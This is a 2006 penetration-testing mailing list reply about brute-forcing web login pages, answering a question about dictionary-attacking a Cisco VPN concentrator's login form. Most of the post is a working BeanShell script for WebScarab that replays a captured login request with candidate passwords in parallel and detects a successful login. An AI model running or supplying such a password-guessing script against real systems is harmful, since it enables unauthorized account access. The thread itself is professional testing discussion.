Penetration Testing mailing list archives
Re: BruteForcing?
From: Rogan Dawes <discard () dawes za net>
Date: Wed, 18 Oct 2006 10:28:35 +0200
Troy Fletcher wrote:
Sparky, For brute forcing WebPages, I use Perl scripts combined with Linux tools like cURL and Wget. If you know any programming/scripting languages, I can point you in the right direction. To help see the traffic exchange for a WebPage login attempts I recommend using a proxy like WebScarab; once you see the POSTs or GETs automating attacks with cURL is easy. I don't know any _good_ pre-made WebPage bruteforce tools, but I'm sure that if someone else does; they'll share.
WebScarab can also be used to brute force web pages, using the Scripted plugin. One major advantage to using WebScarab is that your attack is/can be multi-threaded automatically: WebScarab will attempt up to 4 simultaneous requests.
Here is a simple script that uses an existing request as a template (for URL's, methods, headers, etc) and just replaces the request body. In my example, I'll take words from an predefined array, but the technique can very easily be extended to reading lines from a file.
The script language is BeanShell, which is very similar to Java (BeanShell can evaluate actual Java classes in "strict" mode).
// check the source (or the appendix in the online help) for the // methods you can use on Request and Response import org.owasp.webscarab.model.Request; import org.owasp.webscarab.model.Response; // This function/method is the main loop. // You need to provide three methods that this function will invoke // // boolean hasMoreRequests() - if there are more requests to issue // Request getNextRequest() - the next request to submit // void handleResponse(Response response) - allows you to do something // with the responses obtained // void fetchParallel() { // while we have more requests to submit, or we are busy processing // the last requests sent off/waiting for a response while (hasMoreRequests() || scripted.isAsyncBusy()) { // while there are fewer than 4 outstanding requests // and we have more to try while (scripted.hasAsyncCapacity() && hasMoreRequests()) { scripted.submitAsyncRequest(getNextRequest()); } // if there is a response waiting to be processed if (scripted.hasAsyncResponse()) { while (scripted.hasAsyncResponse()) { handleResponse(scripted.getAsyncResponse()); } } else Thread.sleep(100); } } String[] words = new String[] {"word1", "word2", "word3", "word4"}; int nextWord = 0; boolean stop = false; // This gets a copy of the request with ID 17, from the past // conversations. Adjust to suit your particular situation. Request template = scripted.getRequest(53); boolean hasMoreRequests() { return nextWord < words.length || stop; } Request getNextRequest() { Request req = new Request(template); // make a copy String word = words[nextWord++]; // increment the counter out.println("Trying " + word); // Note that the content is always a byte array // you might also want to consider URLEncoding your words? // Also note that IF there is an existing Content-Length header // it will automatically be updated to match the length of the // content req.setContent(("username=joe&password=" + word).getBytes()); return req; } void handleResponse(Response response) { byte[] content = response.getContent(); if (response.getStatus().equals("200") && content != null) { String html = new String(content); // consider encoding? if (html.indexOf("successful")>-1) { // we're in! Save it for review scripted.addConversation(response); stop = true; } } } // start the main loop fetchParallel();
-----Original Message----- From: listbounce () securityfocus com [mailto:listbounce () securityfocus com]On Behalf Of 09sparky () gmail com Sent: Sunday, October 15, 2006 12:03 PM To: pen-test () securityfocus com Subject: BruteForcing? This is more of a general brute forcing question, but one which I could use some assistance.
[snip]
Second question: Brute forcing also, but against WebPages. For example, a Cisco 3000 VPN Concentrator, I have the webpage asking for username/password. How would I attempt to dictionary attack this? Thanks, Sparky
------------------------------------------------------------------------ This List Sponsored by: Cenzic Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast. Click the link to buy it, try it or download Hailstorm for FREE. http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW ------------------------------------------------------------------------
Current thread:
- BruteForcing? 09sparky (Oct 16)
- Re: BruteForcing? Fab (Oct 16)
- Re: BruteForcing? Jeremy Saintot (Oct 17)
- Re: BruteForcing? Christine Kronberg (Oct 17)
- <Possible follow-ups>
- RE: BruteForcing? Hagen, Eric (Oct 16)
- Re: BruteForcing? Paolo Scarabelli (Oct 17)
- RE: BruteForcing? Troy Fletcher (Oct 17)
- Re: BruteForcing? Rogan Dawes (Oct 18)
- RE: BruteForcing? Troy Fletcher (Oct 17)
- RE: BruteForcing? Hagen, Eric (Oct 17)